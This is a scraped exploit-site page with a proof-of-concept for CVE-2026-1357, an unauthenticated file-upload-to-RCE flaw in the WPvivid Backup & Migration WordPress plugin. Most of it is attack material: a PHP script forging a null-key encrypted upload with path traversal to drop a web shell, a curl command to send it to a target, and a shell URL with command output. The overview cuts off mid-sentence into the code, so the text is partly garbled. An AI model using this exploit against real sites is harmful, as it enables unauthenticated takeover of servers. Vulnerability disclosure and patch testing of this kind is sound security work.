Share
## https://sploitus.com/exploit?id=C1C90920-9C4E-5000-A5A1-B5364432B265
# CVE-2026-1357 WPvivid Backup & Migration RCE PoC
**Discovered by:** Lucas Montes (NiRoX)
**Vulnerability:** Unauthenticated Arbitrary File Upload leading to Remote Code Execution (RCE)
**CVE ID:** CVE-2026-1357
**CVSS:** Critical(9.8)
**Status:** Patched in version **0.9.124**
---
## Overview
This repository contains the analysis and Proof of Concept (PoC) for a critical vulnerability in the **WPvivid Backup & Migration** WordPress plugin (versions setBlockLength(128);
// 2. VULNERABILITY REPRODUCTION
// The server defaults to a null key when RSA decryption fails (returns false).
// We set our local key to 16 null bytes to match the server's vulnerable state.
$rij->setKey(str_repeat("\0", 16));
// 3. The Payload
$shell_content = '';
// 4. The JSON Object with Path Traversal
// We traverse up to /uploads/ to bypass .htaccess restrictions
$params = [
"backup_id" => "1",
"name" => "../uploads/pwn_remote.php",
"data" => base64_encode($shell_content),
"offset" => 0,
"file_size" => strlen($shell_content),
"total_size" => strlen($shell_content),
"index" => 0,
"md5" => md5($shell_content),
"type" => "backup",
"status" => "running"
];
// 5. Encrypt with Null Key
$encrypted = $rij->encrypt(json_encode($params));
// 6. Construct Packet
// "ABC" is the fake RSA key that triggers the 'false' return on the server
$fake_key = "ABC";
$payload = str_pad(dechex(strlen($fake_key)), 3, "0", STR_PAD_LEFT)
. $fake_key
. str_pad(dechex(strlen($encrypted)), 16, "0", STR_PAD_LEFT)
. $encrypted;
echo base64_encode($payload);
?>
```
### Executing the Attack
1. **Generate the Payload:**
```bash
PAYLOAD=$(php exploit.php)
```
2. **Send Request:**
```bash
curl -i -s -X POST 'http://TARGET-URL/' \
-d 'wpvivid_action=send_to_site' \
--data-urlencode "wpvivid_content=$PAYLOAD"
```
3. **Verify RCE:**
If successful, the shell will be accessible at:
```
http://TARGET-URL/wp-content/uploads/pwn_remote.php?cmd=id
```
**Result:**
```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```